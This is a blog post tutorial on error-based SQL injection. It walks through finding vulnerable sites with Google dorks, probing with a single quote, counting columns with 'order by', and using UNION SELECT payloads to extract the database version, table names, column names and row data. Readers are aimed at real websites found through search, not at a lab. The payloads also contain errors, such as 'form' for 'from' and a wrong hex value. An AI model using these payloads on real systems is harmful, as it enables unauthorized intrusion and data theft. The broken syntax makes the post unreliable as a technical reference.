Home 0P3N Blog Error Based SQL Injection: Best practices and projects
Ready to Start Your Career?
Create Free Account
By: Romansh Yadav
January 29, 2017

Error Based SQL Injection: Best practices and projects

By: Romansh Yadav
January 29, 2017
By: Romansh Yadav
January 29, 2017
syringe-1884779_1280Estimated reading time: 3.5 minutesHello Leaders,Today I'm going to talk about the second part of the SQL Injection article.First, I want to explain the purpose of Error-based SQL injection. Don't worry, it's very simple.RETRIEVING DATA FROM THE DATABASEToday, we mostly use SQL injection for bypassing the login form or gaining access into an admin panel or retrieving the data. When attempting to bypass the login form, we use BLIND SQL INJECTION. In this article, I will talk about the error based SQL injection.As the name suggests, error based means it is all based on the errors. In this attack, we will type or send something to the server by URL and the server will show us an error. After getting the error, we will decide on who the next target will be.First, we have to find the SQL error based venerable website on Google. Go to Google and type the following:inurl index.php ? id=inurl gallery.php id=The next goal is to find out if our page is currently talking or is connected with the database or not.https://www.example.com/gallery.php?id=6In order to find this, we just need to put a single quote after the id number like this:http://www.example.com/gallery.php?id=6'If it shows an error and the error is a SQL syntax error, then this page is connected with the database and website is also vulnerable.What the single quest does is actually single quest breaks the query and the syntax of the query has been changed, or we could say that it was converted into the wrong syntax. So, we get the error SQL syntax error.Now we know the website is vulnerable just need to find all the number of columns. Again we are going to inject a query for getting the error. Now, what we do is arrange all the columns in order.http://www.example.com/gallery.php?id=6 order by 1http://www.example.com/gallery.php?id=6 order by 2http://www.example.com/gallery.php?id=6 order by 3We will do this until it shows up in the unknow columns. If it shows the unknown column error on N, that means it has the total number of Columns N-1 because it shows the content in order by N-1.Now we are going to find out which columns are connected to our current URL page so that we can say which columns are vulnerable. Technically it's not vulnerable. It is just connected to our current URL page.http://www.example.com/gallery.php?id=6 union all select 1,2,3,4,N-1.It shows us the current page connected columns because we can only access the database by these columns.  It shows the columns' number. If it shows 2,4 then 2 and 4 is connected with our current URL page. The next step is to find out the version and database.  We will do this by using any one of the 2 or 4. We are using 2 or 4 just because they are only connected to the current page.http://www.example.com/gallery.php?id=6 union all select 1,version(),3,4,N-1.http://www.example.com/gallery.php?id=6 union all select 1,database(),3,4,N-1.We can find other information by using a few things. One thing every person should keep in mind is: The more information you have, the more powerful you will be.If the version of SQL is more than 5.0.0, it means it has the schema. Schema is just like an index of all databases.Now our next step is to find out all the table names. To do this, we will again inject a query.http://www.example.com/gallery.php?id=6 union all select 1,group_concat(table_name),3,4,N-1 form Information_schema.tables where table_schema=database()--It will show all the table names from the table_schema.Our next step is to find out all the columns. Use the MySQL char value of any of the table names. Take any table name and convert it by using the hack bar into MySQL char and copy and paste it into the query.http://www.example.com/gallery.php?id=6 union all select 1,group_concat(column_name),3,4,N-1 form Information_schema.columns where table_name=mysqlchar--Now that we have the columns' name, our final attack is to get the data because we have table name, columns name, and database name. Table_name should be the same that we used to mysqlchar for finding the columns' name.http://www.example.com/gallery.php?id=6 union all select 1,group_concat(column_name,0x0a),3,4,N-1 form table_name0x0a is the hex value of comas(,).it will seprated the table data into comas.Hope this information will help you to became more knowledgeable in error based SQL injection.Thanks & Best Regards.
Request Demo

Build your Cybersecurity or IT Career

Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry